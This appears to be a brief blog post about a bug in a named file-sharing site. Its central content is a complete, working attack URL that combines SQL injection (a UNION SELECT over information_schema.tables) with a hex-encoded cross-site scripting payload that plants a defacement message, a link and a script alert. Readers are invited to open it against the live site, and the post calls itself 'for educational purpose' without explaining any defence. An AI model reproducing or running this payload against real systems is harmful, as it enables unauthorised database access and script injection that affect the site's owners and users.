Hi viewers recently a bug in rapidog website which is a file sharing site ,
the bug includes both sql injection + xss attacks ,
go to the below link and enter the captcha code , you can see the hack with your eyes ,
http://rapidog.com/search/file.php?file_id=-12351668%20union%20select%201,concat%280x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x74,0x68,0x65,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x2C,0x20,0x3C,0x61,0x20,0x68,0x72,0x65,0x66,0x3D,0x22,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x22,0x3E,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x3C,0x2F,0x61,0x3E,0x3C,0x73,0x63,0x72,0x69,0x70,0x74,0x3E,0x61,0x6C,0x65,0x72,0x74,0x28,0x27,0x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x74,0x68,0x65,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x2C,0x20,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x27,0x29,0x3B,0x3C,0x2F,0x73,0x63,0x72,0x69,0x70,0x74,0x3E%29,3,4,5,6,7,8%20from%20information_schema.tables%20--
Bug found by Hussain .
Done for educational purpose !!!! :)
0 comments:
Post a Comment